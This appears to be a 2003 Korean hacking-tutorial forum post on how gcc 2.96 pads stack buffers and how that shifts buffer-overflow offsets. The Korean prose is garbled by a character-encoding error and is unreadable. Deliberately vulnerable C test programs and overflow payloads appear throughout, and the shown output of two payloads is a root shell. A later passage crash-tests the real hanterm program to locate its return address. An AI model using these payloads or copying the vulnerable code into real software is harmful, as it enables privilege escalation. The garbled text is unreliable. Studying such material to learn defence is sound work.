http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=68 [º¹»ç]
Á¦°¡ ¾Æ·¡ ¿Ã¸° ¹®¼µéÀÇ ´ëºÎºÐÀº gcc ÄÄÆÄÀÏ·¯ ¹öÁ¯ 2.95 ÀÌÇÏÀÇ
ȯ°æ¿¡ Àû¿ëµÇµµ·Ï ÀÛ¼ºµÈ °ÁÂÀÔ´Ï´Ù. µû¶ó¼ ¸¸¾à ¿©·¯ºÐÀÌ gcc 2.96
ÀÌ»óÀÇ ¹öÁ¯ÀÌ ¼³Ä¡µÈ ȯ°æ¿¡¼ ¹öÆÛ ¿À¹öÇ÷ο츦 ½ÀÇϽ÷Á¸é ½ÇÁ¦
¹®¼ ³»¿ë°ú Â÷ÀÌ°¡ ³ª´Â ºÎºÐÀÌ »ý±æ°Ì´Ï´Ù.
±×¿¡ µû¸¥ ÇØ°á ¹æ¹ý¿¡ ´ëÇؼ± ¾Æ·¡ ¹®¼¸¦ º¸½Ã¸é ¾Ë ¼ö ÀÖÀ»°Å±¸¿ä.
ÃßõÇÏ´Â ÇнÀ ¹æ¹ýÀº gcc 2.95 ÀÌÇÏ ¹öÁ¯ÀÇ È¯°æ¿¡¼ ¹öÆÛ ¿À¹öÇ÷ο츦
ÇнÀÇϽŠÈÄ ±× ´ÙÀ½ gcc 2.96 ÀÌ»óÀÇ ¹öÁ¯¿¡¼ÀÇ Àû¿ë ¹æ¹ýÀ» ÀÍÈ÷´Â
°ÍÀÔ´Ï´Ù. Âü°í·Î F.T.ZÀº gcc 2.95 ÀÌÇÏÀÇ ¹öÁ¯À» »ç¿ëÇÏ°í ÀÖÀ¸¹Ç·Î
º¯°æµÈ ¹öÆÛ ±¸Á¶¿¡ ±¸¾Ö¹ÞÁö ¾Ê°í ÇнÀÇÏ½Ç ¼ö ÀÖ±¸¿ä. ÁýÀ̳ª ´Ù¸¥ ¼¹ö¿¡¼
ÇнÀÇϽ÷Á¸é ´ÙÀ½°ú °°Àº °úÁ¤À» °ÅÄ¡½Ã¸é ¿¹Àü ¹öÁ¯ÀÇ gcc¸¦ »ç¿ëÇÏ½Ç ¼ö
ÀÖ½À´Ï´Ù.
1. ³» ¼¹öÀÇ gcc ¹öÁ¯ È®ÀÎ.
[root@hancom root]# gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (HancomLinux 2.2 2.96-99hl)
[root@hancom root]#
--> 2.96 ÀÌ»óÀ̱º¿ä.
2. ¾î¶² ÆÐÅ°Áö¿¡ gcc ÇÁ·Î±×·¥ÀÌ Æ÷ÇԵǾî ÀÖ´ÂÁö¸¦ È®ÀÎ.
[root@hancom root]# rpm -qf /usr/bin/gcc
gcc-2.96-99hl
[root@hancom root]#
--> ÀÌ ÆÐÅ°Áö¸¦ Á¦°ÅÇϸé gccµµ »ç¶óÁö°ÚÁÒ?
3. ÇØ´ç ÆÐÅ°Áö »èÁ¦.
[root@hancom root]# rpm -e gcc-2.96-99hl --nodeps
[root@hancom root]#
4. ÀÌÀü ¹öÁ¯ÀÇ gcc ¼³Ä¡( ÀÌÀü ¹öÁ¯ÀÇ gcc´Â egcs ÆÐÅ°Áö¿¡ Æ÷ÇԵǾî ÀÖÀ½. )
[´Ù¿î·Îµå] <- egcs-1.1.2 ÆÐÅ°Áö
<¼³Ä¡>
[root@hancom egc]# rpm -ivh egcs-1.1.2-30.i386.rpm --nodeps --force
Preparing... ########################################### [100%]
1:egcs ########################################### [100%]
[root@hancom egc]#
5. È®ÀÎ
[root@hancom egc]# gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
[root@hancom egc]#
--> ¿À¿¹ 2.91ÀÌ µÇ¾ú³×¿ä.
6. ´Ù½Ã ¿¹Àü ¹öÁ¯ÀÇ gcc¸¦ º¹±¸½ÃÅ°·Á¸é ¹Ý´ë·Î egcs¸¦ ¾ðÀνºÅçÇÑ ÈÄ
gcc-2.96.99hlÀ» ¼³Ä¡ÇÏ¸é µÇ°ÚÁÒ?
[root@hancom egc]# rpm -e egcs-1.1.2-30 --nodeps
[root@hancom egc]# mount /dev/cdrom
[root@mongii /root]# rpm -ivh /mnt/cdrom/RedHat/RPMS/gcc-2.96-99hl.i386.rpm
gcc ##################################################
[root@hancom root]# gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (HancomLinux 2.2 2.96-99hl)
[root@hancom root]#
* ¿ó½º. ÇÑ°¡Áö ÀØ°í ÀÖ¾ú´ø°Ô Àֳ׿ä. ÀÌÀü ¹öÁ¯ÀÇ gcc¸¦ ¼³Ä¡ÇÏÁö ¾Ê°íµµ
ÀÌÀü ¹öÁ¯ÀÇ ¹öÆÛ ±¸Á¶·Î ÄÄÆÄÀÏÇÏ´Â ¿É¼ÇÀÌ µû·Î ÀÖ½À´Ï´Ù.
ex) gcc -o test test.c -mpreferred-stack-boundary=2
À§ÀÇ ¿É¼ÇÀ» »ç¿ëÇϸé 2.96 ¹öÁ¯ ÀÌ»óÀÇ gcc¿¡¼µµ 2.95ÀÌÇÏÀÇ ¹öÆÛ
¸ð¾çÀ¸·Î ÄÄÆÄÀÏ ÇÒ ¼ö ÀÖ½À´Ï´Ù. Å×½ºÆ® ȤÀº °ø°³ ÇØÅ· ¼¹ö¸¦ ¸¸µå½Ã°Å³ª
¸Å¹ø ¿É¼ÇÀ» »ç¿ëÇÏ´Â °ÍÀÌ ºÒÆíÇÏ½Ç ¶§ ¸ÕÀú ¼³¸íµå¸° ¹æ¹ýÀ» ÀÌ¿ëÇϼ¼¿ä.
---------------------------------------------------------------------------
GCC ¹öÁ¯ 2.96¿¡¼ buf±¸Á¶ -. hackerleon in Null@Root
·¹µåÇò 7.0 ÀÌ»ó¹öÁ¯¿¡¼´Â gcc2.96À» ü¿ëÇÏ°íÀÖ´Ù.
gcc2.96·Î ÄÄÆÄÀÏµÈ ÇÁ·Î±×·¥ÀÇ°æ¿ì ¹öÆÛ±¸Á¶°¡ º¯ÇüµÇ´Â°ÍÀ» º¼¼ö Àִµ¥..
À̹ø ±Û¿¡¼´Â gcc2.96¿¡¼ÀÇ ¹öÆÛ±¸Á¶¸¦ ÆÄÈ®Çغ¸°íÁ® ÇÑ´Ù.
¾ó¸¶Àü Á¦ ȨÆäÀÌÁö¿¡¼ ÇÁ·¹ÀÓ Æ÷ÀÎÅÍ¿¡ °üÇÑ »çÇ×Áß gcc¹öÀü 2.96¿¡¼ ¹®Á¦Á¡¿¡ °üÇÑ ¿¬±¸±ÛÀ» NaNu9´Ô ¿Ã·ÁÁÖ½ÅÀûÀÌ ÀÖ¾ú´Ù^^°¨»ç!!..±× ¿¬±¸ °á°ú¸¦ Åäµ¥·Î ±âÁ¸ÀÇ Ãë¾àÇÁ·Î±×·¥¿¡ Àû¿ë½Ã ¾î¶°ÇÑ ÇüÅ·ΠÀû¿ëµÇ¸ç, gcc 2.96¿¡¼ ¸Þ¸ð¸® ±¸Á¶´Â ¾î¶°ÇÑ°¡¸¦ ¾Ë¾Æº¸°í BOF³ª FSB¿¡ Àû¿ëÇÒ¼ö ÀÖ´Â ¹æ¹ýÀ» ¾Ë¾Æº¸°íÀÚ ÇÑ´Ù.
¿ì¼± http://hackerleon.cybersoldier.net ÀÇ Q&A¶õÀÇ 470¹ø ±ÛÀ» ÂüÁ¶ÇÏ¿© ±âº» ÀüÁ¦·Î ÇÑ´Ù
´ÙÀ½ÀÇ µ¿ÀÏÇÑ ¼Ò½º¸¦ °¢°¢ gcc 2.91°ú 2.96¿¡¼ ÄÄÆÄÀÏÇØ º¸µµ·Ï ÇÏÀÚ.
//test1.c
#include "dumpcode.h"
#include
main()
{ char buf2[12];
char buf[20];
fgets(buf,128,stdin);
printf("buf1:%x , buf2:%x, %d\n",buf,buf2,buf2-buf);
dumpcode((char*)buf,64);
}
test1À» ÅëÇØ gcc 2.96°ú gcc 2.91·Î °¢°¢ ÄÄÆÄÀÏµÈ ÇÁ·Î±×·¥ÀÇ ¸Þ¸ð¸® ±¸Á¶¸¦ º¸·Á°í ÇÑ´Ù.
¿ì¼± gcc 2.91¿¡¼ÀÇ °á°úÀÌ´Ù.
$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
$ gcc test1.c -o test1
$./test1
a
buf1:bffffa98 , buf2:bffffaac, 20
0xbffffa98 61 0a 00 40 34 97 04 08 60 ae 00 40 04 fb ff bf a..@4...`..@....
0xbffffaa8 b8 fa ff bf 4b 84 04 08 20 97 04 08 34 97 04 08 ....K... ...4...
0xbffffab8 d8 fa ff bf cb 29 03 40 01 00 00 00 04 fb ff bf .....).@........
0xbffffac8 0c fb ff bf 68 38 01 40 01 00 00 00 b0 83 04 08 ....h8.@........
À§ÀÇ °á°ú´Â ¿ì¸®°¡ ¾ÆÁÖ ¸¹À̺Á¿Ô±¸..´ç¿¬ÇÑ °á°ú ÀÌ´Ù..µµ½ÄÀûÀ¸·Î º¸¸é
[buf(20)][buf2(12)][ebp(4)][ret]
¾ÆÁÖ dump¸¦ ¾ÈÇغÁµµ °£´ÜÇÏ°Ô À¯Ãß°¡ °¡´É ÇÏ´Ù.
±×·³ À̹ø¿¡´Â gcc 2.96¿¡¼ÀÇ °á°úÀÌ´Ù.
$gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
$gcc test1.c -o test1
$./test1
a
buf1:bfffefa0 , buf2:bfffefc0, 32
0xbfffefa0 61 0a 00 40 a8 ca 13 40 44 f0 ff bf ce 6b 12 40 a..@...@D....k.@
0xbfffefb0 e8 ef ff bf 20 d0 00 40 50 83 04 08 a8 ca 13 40 .... ..@P......@
0xbfffefc0 44 f0 ff bf 44 63 01 40 e8 ef ff bf d1 84 04 08 D...Dc.@........
0xbfffefd0 18 98 04 08 fc 98 04 08 18 f0 ff bf fc bb 03 40 ...............@
À̹øÀÇ °á°ú´Â ¾ÆÁÖ À̻󽺷´´Ù. buf¿¡¼ buf2±îÁöÀÇ °Å¸®°¡ 32byte·Î ³ª¿Ô±¸..
¸Þ¸ð¸®±¸Á¶¸¦ º¸¾Æµµ ¾ÆÁÖ À̻󽺷¯¿î ¹è¿À» ÇÏ°í ÀÖ´Ù..µµ½ÄÀûÀ¸·Î º¸¸ç
[buf(20)][dummy1(12)][buf2(12)][dummy2(4)][dummy3(8)][ebp(4)][ret]
¸Þ¸ð¸® »çÀÌ»çÀÌ ¸¶´Ù dummy(-ÀÓÀÇ·Î ¸íÇÔ-)µéÀÌ µé¾î°¡´Â °ÍÀ» º¼¼ö ÀÖ´Ù..
ÀÌ·¸µí gcc 2.96¿¡¼´Â ¸Þ¸ð¸®ÀÇ ±¸Á¶¸¦ ÆÄÈ®Çϱ⠾î·Æ°Ô µÇ¾îÀִµ¥...
½É½ÉÇÑ ¿©¸§Àú³á ÇÒÀϵµ ¾ø°í Çؼ ¾à°£ÀÇ ³ë°¡´Ù¸¦ Çغ»°á°ú Àç¹ÌÀÖ´Â ±ÔÄ¢¼ºÀ» ¾Ë¾Æ³»°Ô µÇ¾ú´Ù.
test1¿¡ buf¿Í buf2ÀÇ Å©±â¸¦ º¯°æÇØ°¡¸ç buf¿¡¼ buf2±îÁöÀÇ °Å¸®¸¦ °è»êÇØ º¸¾Ò´Ù.
[http://hackerleon.cybersoldier.net/images/gcc296.jpg]
- Ç¥1ÂüÁ¶ -
Ç¥1¿¡¼ º¸¸é.. (Á¤¸» ÇÒÀÏ ¾ø¾ú³ªº¸´Ù^^)
bufÀÇ Å©±â°¡ 16ÀÇ ¹è¼ö·Î ³ª°¡°í ù16¹è¼ö ÀÌÈĺÎÅÍ ´ÙÀ½ 16¹è¼ö ±îÁö´Â buf2°¡ 12byteÀÌ»óÀÏ°æ¿ì ´ÙÀ½16¹è¼ö °ªÀÌ °Å¸®·Î ³ª¿À´Â°ÍÀ» º¼¼ö ÀÖ´Ù..
Áï...test1¿¡¼ º¸¸é..buf °¡ 20¹ÙÀÌÆ®À̹ǷΠ16 < buf <= 32 ¹üÀ§¿¡ ÀÖ°í µû¶ó¼ buf2¿ÍÀÇ °Å¸®´Â "32" ÀΰÍÀÌ´Ù.
±×·³ ÀÓÀÇ·Î buf°ªÀ» Á¤ÇÏ°í buf2±îÁöÀÇ °Å¸®¸¦ °è»êÇغ¸ÀÚ..
buf=200
buf2=12
¿¡¼ 16x12=192, 16x13=208 À̹ǷΠ192 < buf <= 208 ¹üÀ§¿¡ ÀÖ´Ù µû¶ó¼ À§ÀÇ ¾ÆÀ̵ð¾î°¡ ¸Â´Ù¸é °Å¸®´Â 208ÀÌ ³ª¿Í¾ß ÇÒ°ÍÀÌ´Ù.
À½...À̾ÆÀ̵ð¾î°¡ ¸Â´ÂÁö bufÀÇ Å©±â¸¦ º¯°æÇÏ¿© ½ÃÇàÇÏ¿©º¸ÀÚ
//test2.c
#include
main()
{ char buf2[12];
char buf[200];
fgets(buf,224,stdin);
printf("buf1:%x , buf2:%x, %d\n",buf,buf2,buf2-buf);
}
$gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
$gcc test2.c -o test2
$./test2
a
buf1:bfffeef0 , buf2:bfffefc0, 208
¿ª½Ã ¾ÆÀ̵ð¾î°¡ ¸Â¾Ò´Ù...
±×·³ ¿ì¸° gcc 2.96¿¡¼µµ ¼Ò½º¿¡¼ º¯¼öÀÔ·ÂÁ¦ÇÑÀÌ ¾ø´Ù¸é Ãë¾àÇÁ·Î±×·¥ÀÇ ¸Þ¸ð¸®±¸Á¶¸¦ À¯ÃßÇÏ¿© °ø·«À» ÇÒ¼ö ÀÖ°Ú´Ù...^^
´ãÀº buf2¿¡¼ ret±îÁöÀÇ ¸ð¾çÀ» º¸µµ·Ï ÇÏÀÚ..
test1¿¡¼ÀÇ °á°ú
[buf(20)][dummy1(12)][buf2(12)][dummy2(4)][dummy3(8)][ebp(4)][ret]
ÀÌ·¸°Ô »ý°Ü¸ÔÀº °ÍÀ» º¸¾Ò´Ù..¾Õ¼ buf¿¡¼ buf2»çÀÌÀÇ dummyÀÇ ±æÀÌ´Â ¾Ë¾Æº¸¾Ò°í...buf2¿¡¼ ret±îÁöÀÇ °Å¸®¿¡ ´ëÇؼµµ ¾Ë¾Æº¸ÀÚ...
¿ª½Ã ¸¶Ã®°¡ÁöÀεí ÇÏ´Ù..^^
test3¸¦ º¸ÀÚ
//test3.c
main()
{ char buf[20];
fgets(buf,64,stdin);
dumpcode((char*)buf,64);
}
$./test3
a
0xbfffefb0 61 0a 00 bf 20 d0 00 40 50 83 04 08 a8 ca 13 40 a... ..@P......@
0xbfffefc0 44 f0 ff bf 44 63 01 40 e8 ef ff bf d1 84 04 08 D...Dc.@........
0xbfffefd0 d0 97 04 08 b4 98 04 08 18 f0 ff bf fc bb 03 40 ...............@
0xbfffefe0 01 00 00 00 44 f0 ff bf 4c f0 ff bf 66 83 04 08 ....D...L...f...
¿©±â¼ gdb·Î ret¸¦ ¾Ë¾Æº»°á°ú ret°ªÀÌ 0x4003bbfc ·Î ³ª¿Ô´Ù µû¶ó¼
ret´Â 0xbfffefdc ÀÌ´Ù.
¿©±â¼µµ ¾Õ¼ °è»êÇÑ°Í°ú °°ÀÌ buf2ÀÇ Å©±â°¡ 16ÀÇ ¹è¼öÀÇ ¹üÀ§¿¡¼ ÃÖ´ë°ªÀ» ±âÁØÀ¸·Î dummy°¡ »ý¼ºµÈ´Ù´Â°ÍÀ» ¾Ë¼ö ÀÖ´Ù..
buf°¡ 20 À̹ǷΠ16 < buf <= 32 ¹üÀ§¿¡ ÀÖ°í µû¶ó¼ buf¿¡¼ dummy3±îÁöÀÇ °Å¸®´Â 32ÀΰÍÀÌ´Ù.
Á¤¸®Çغ¸¸é
[buf(20) ----> 32(20+12)][dummy3(8)][ebp(4)][ret]
À¸ÇÏÇÏ...ret±îÁöÀÇ °Å¸®µµ °è»êÇÏ¿© À¯Ãß°¡ °¡´É ÇÏ´Ù...
±×·³ ½ÇÀü BOF¹®Á¦¸¦ gcc 2.96¿¡¼ ÄÄÆÄÀÏ Çغ¸°í ¿ì¸®°¡ »ý°¢ÇÑ °ÍÀÌ ¸Â´Â°¡¸¦ È®ÀÎÇغ¸µµ·Ï ÇÏÀÚ.
//test4.c
#include
void printit() {
printf("Hello there!\n");
}
main()
{ int crap;
void (*call)()=printit;
char buf[20];
fgets(buf,50,stdin);
setreuid(0,0);
call();
}
¾î¼ ¸¹ÀÌ º¸µç ¼Ò½ºÀÌ´Ù^^(mainsourece newbie13¹ø ¹®Á¦)
gcc 2.96¿¡¼¸é buf(20)µÚ¿¡ printitÀ» callÇÏ´Â ÁÖ¼Ò°¡ ³ª¿À¹Ç·Î..egg¸¦ ¶ç¿ì°í [20][egg] ¸¦ ÀÔ·ÂÇÏ¸é ¹Ù·Î shellÀ» ȹµæ ÇÒ¼ö ÀÖ¾ùÀ» °ÍÀÌ´Ù...
±×·³ gcc 2.96À¸·Î ÄÄÆÈµÈ ³ÑÀº ¾î¶»°Ô ÇÒ±î...À§¿¡¼ °øºÎ Çѵ¥·Î..
¿ì¼± bufÀÇ Å©±â°¡ 20 À̹ǷΠ16 < buf <=32 ¹üÀ§ÀÌ´Ù µû¶ó¼ buf¿¡¼ dummy3±îÁöÀÇ °Å¸®´Â 32 ÀÌ´Ù..
dummy3ÀÇ Å©±â´Â À§¿¡¼ º¸¾ÒµíÀÌ 8byte À̹ǷΠprintit À» callÇÏ´Â ÁÖ¼Ò±îÁöÀÇ °Å¸®´Â 32+8 = 40 ¹ÙÀÌÆ® ÀμÀÀÌ´Ù.
µû¶ó¼ °ø°Ý ¹æ¹ýÀº [40][egg]°¡ µÇ°Ú´Ù.. ¸Â³ª »ìÆ캸µµ·Ï ÇÏÀÚ.
egg:0xbffffa78
$(printf "AAAA...(40)\x78\xfa\xff\xbf";cat)\./test4
id
uid=500(leon) gid=(500)leon euid=0(root)
µÈ´Ù...
±×·³ À̹ø¿¡´Â ¸®ÅϾîµå·¹½º¸¦ º¯Á¶ÇÏ´Â ¹®Á¦¸¦ Ç®¾îº¸ÀÚ.
//test5.c
#include
main()
{
char buf[20];
printf("name :");
fgets(buf,50,stdin);
printf("Hi %s",buf);
}
¸¶Ã¯°¡Áö·Î 2.91¿¡¼´Â egg¸¦ ¶ç¿îÈÄ [20][ebp][ret]À̹ǷÎ...
°ø°ÝÀº [24][&egg] ÇϸéµÉ°ÍÀÌ´Ù. ±×·¯³ª 2.96¿¡¼± À§¿¡¼¿Í °°ÀÌ Àû¿ëÇÒ°æ¿ì.
buf°¡ 20¹ÙÀÌÆ®À̹ǷΠ16 < buf < 32 µû¶ó¼ buf¿¡¼ dummy3±îÁöÀÇ °Å¸®´Â 32¹ÙÀÌÆ®ÀÌ°í dummy3´Â 8¹ÙÀÌÆ® sfp 4¹ÙÀÌÆ® °á°ú..
[20[12][8][4] => [44¹ÙÀÌÆ®][egg] ·Î °ø°ÝÀ» ÇØ¾ß ÇÒ°ÍÀÌ´Ù.±×·³..
egg:0xbffffa78
$(printf "AAAA...(44)\x78\xfa\xff\xbf";cat)\./test4
id
uid=500(leon) gid=(500)leon euid=0(root)
¶Ç µÈ´Ù^^.
±×·³ À̹ø¿¡´Â ³»Ä£±è¿¡ »ó¿äÇÁ·Î±×·¥ÀÇ ¿À·ù´ë¸í»ç "hanterm"¿¡ Àû¿ëÇغ¸ÀÚ.
ÀÏ´Ü gcc 2.91¿¡¼´Â
$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
$hanterm -fn `perl -e "print 'a'x88"`
can't load english font aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa~~Áß·«~aaaaaaa
¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù
88¹ÙÀÌÆ®¿¡¼ ¼¼±×¿À·ù°¡ ³µÀ¸¸ç Áï, [84][fsb][ret] ÀÓÀ» À¯ÃßÇÏ¿© °ø°ÝÇÒ¼ö ÀÖ´Ù.
±×·³ 2.96¿¡¼´Â...¾î¶»°Ô µÉ±î.. ¹öÆÛ¸¦ À¯ÃßÇغ¸ÀÚ..
ÀÏ´Ü -fn¿É¼ÇÀÇ º¯¼ö(ÀÓÀÇ·Î 'buf'¶óÇÏÀÚ)Å©±â°¡ 84¹ÙÀÌÆ®À̹ǷÎ..
16x5=80 < buf < 16x6=96
µû¶ó¼, buf¿¡¼ dummy3±îÁöÀÇ °Å¸®´Â 96¹ÙÀÌÆ®ÀÌ´Ù.±×·¯¹Ç·Î
[96][8][4][ret] ¶ó´Â °è»êÀÌ ³ª¿Â´Ù.. Áï, 108¿¡¼ ÃÖÃÊ ¼¼±×¿À·ù°¡ ³ª¾ßÇÒ°ÍÀÌ´Ù. ±×·³ Á¤¸» ±×·±Áö..
$gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
$hanterm -fn `perl -e "print 'a'x107"`
can't load english font aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa~~Áß·«~aaaaaaaaaaaaaaaa
$hanterm -fn `perl -e "print 'a'x108"`
can't load english font aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa~~Áß·«~aaaaaaaaaaaaaaaaa
¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù
¿¹»óÇÞ´ø µ¥·Î±º¿ä...^^
µû¶ó¼ 2.96ÇÏÀÇ hanterm¿ª½Ã °ø°ÝÇÒ¼ö°¡ ÀÖ°Ù½À´Ï´Ù.
¸î°¡Áö ¿¹Á¦¸¦ ÅëÇؼ ¿ì¸®´Â gcc 2.96¿¡¼µµ ¸Þ¸ð¸®ÀÇ »ó´ëÀû À§Ä¡¸¦ À¯Ãß ÇÒ¼ö ÀÖ°Ô µÇ¾ú´Ù...
±×·¯³ª ¿©±â¼..
¾ÆÁÖ Áß¿äÇÑ Á¡ Çϳª°¡ ÀÕ´Ù..
Áï, fgetsÀÇ ÀÔ·ÂÇѵµ¸¦ ÀÛ°Ô ÀâÀ¸¸é ¿À¹ö¸¦ ÇÒ¼ö ¾ø´Ù´Â Á¡ÀÌ´Ù.
µû¶ó¼ gcc 2.96¿¡¼´Â ´ÙÀ½°ú °°ÀÌ Á¤¸®ÇÒ¼ö ÀÖ´Ù.
1. º¯¼ö1°ú º¯¼ö2 °£°Å¸®´Â º¯¼ö1ÀÌ 16ÀÇ ¹è¼öÁß ÃÖ´ë°ª ¸¸Å ÀÌ´Ù.(´Ü, º¯¼ö2°¡ 12¹ÙÀÌÆ® ÀÌ»óÀÏ°æ¿ì)
2. º¯¼öÁ¤ÀÇ°¡ ³¡³ª´Â °÷Àº dummy3(8byte)°¡ ÇÒ´çµÈ´Ù.
3. º¯¼ö ÀԷ¹üÀ§¸¦ º¯¼ö°¡ ¼ÓÇÏ´Â 16¹è¼ö ÃÖ´ë°ª ÀÌÇÏ·Î ÇÒ°æ¿ì BOF·ÎÀÎÇÑ ¹ö±×´Â ÀϾÁö ¾Ê´Â´Ù.
¾î¼ö¼± ÇÏ°Ô gcc2.96¿¡¼ÀÇ Ãë¾à ÇÁ·Î±×·¥ÀÇ Àû¿ëÀ» ¾Ë¾Æº¸¾Ò´Ù..
gcc 2.96¿¡¼ ÄÄÆÄÀÏµÈ FSBÀÇ ret°ª °è»êÀ̳ª..BOF retã±âµî¿¡ À¯¿ëÇÒ°Í °°±¸ Á»´õ ¸¹Àº ¿¬±¸°¡ ÀÌ·ç¾î Áö¸é ÁÁ°Ú´Ù...
|
Hit : 13701 Date : 2003/09/19 11:46
|